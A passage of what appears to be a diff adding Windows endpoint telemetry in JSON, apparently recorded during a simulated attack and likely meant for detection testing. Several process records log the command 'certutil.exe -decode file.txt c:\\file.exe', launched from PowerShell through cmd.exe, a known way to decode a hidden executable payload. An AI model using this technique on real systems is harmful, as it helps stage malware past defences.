"registry", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\WINDOWS\\system32\\certutil.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "registry", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\WINDOWS\\system32\\certutil.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "registry", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\WINDOWS\\system32\\certutil.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "registry", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\WINDOWS\\system32\\certutil.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "registry", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\WINDOWS\\system32\\certutil.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "registry", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\WINDOWS\\system32\\certutil.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "registry", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\WINDOWS\\system32\\certutil.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "registry", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\WINDOWS\\system32\\certutil.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "registry", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\WINDOWS\\system32\\certutil.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "registry", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\WINDOWS\\system32\\certutil.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "registry", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\WINDOWS\\system32\\certutil.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "registry", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\WINDOWS\\system32\\certutil.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "process", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "subtype": "terminate", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "msctf.dll", + "image_path": "C:\\Windows\\System32\\msctf.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573499950016, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "process", + "pid": 204, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-0010979B5501}" + }, + { + "event_type": "file", + "file_name": "CERTUTIL.EXE-CB7805D7.pf", + "file_path": "C:\\Windows\\Prefetch\\CERTUTIL.EXE-CB7805D7.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883573500270000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"certutil.exe -decode file.txt c:\\file.exe\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 4760, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883573500330016, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-00106CAC5501}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4760, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573500270000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-00106CAC5501}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4760, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573500270000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-00106CAC5501}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4760, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573500270000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-00106CAC5501}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4760, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573500270000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-00106CAC5501}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4760, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573500270000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-00106CAC5501}" + }, + { + "command_line": "certutil.exe -decode file.txt c:\\file.exe", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1688, + "ppid": 4760, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "subtype": "create", + "timestamp": 131883573500410000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}", + "unique_ppid": "{42FC7E13-CBE6-5C05-0000-00106CAC5501}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "certutil.exe", + "image_path": "C:\\Windows\\System32\\certutil.exe", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500420000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500420000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500420000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500420000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500420000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500420000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500420000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500420000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "certcli.dll", + "image_path": "C:\\Windows\\System32\\certcli.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500580000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "crypt32.dll", + "image_path": "C:\\Windows\\System32\\crypt32.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500740000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500740000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "crypt32.dll", + "image_path": "C:\\Windows\\System32\\crypt32.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500740000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "Wldap32.dll", + "image_path": "C:\\Windows\\System32\\Wldap32.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500740000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "msasn1.dll", + "image_path": "C:\\Windows\\System32\\msasn1.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500740000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "certca.dll", + "image_path": "C:\\Windows\\System32\\certca.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500740000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "cryptsp.dll", + "image_path": "C:\\Windows\\System32\\cryptsp.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500740000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "gdi32.dll", + "image_path": "C:\\Windows\\System32\\gdi32.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500740000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "cabinet.dll", + "image_path": "C:\\Windows\\System32\\cabinet.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500740000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "cryptui.dll", + "image_path": "C:\\Windows\\System32\\cryptui.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500740000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "gdi32.dll", + "image_path": "C:\\Windows\\System32\\gdi32.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500740000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "gdi32full.dll", + "image_path": "C:\\Windows\\System32\\gdi32full.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500740000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "msvcp_win.dll", + "image_path": "C:\\Windows\\System32\\msvcp_win.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500740000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\System32\\user32.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500740000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "win32u.dll", + "image_path": "C:\\Windows\\System32\\win32u.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500740000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "bcrypt.dll", + "image_path": "C:\\Windows\\System32\\bcrypt.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500740000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "comctl32.dll", + "image_path": "C:\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.17134.441_none_f952a0bb30955e96\\comctl32.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500740000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": 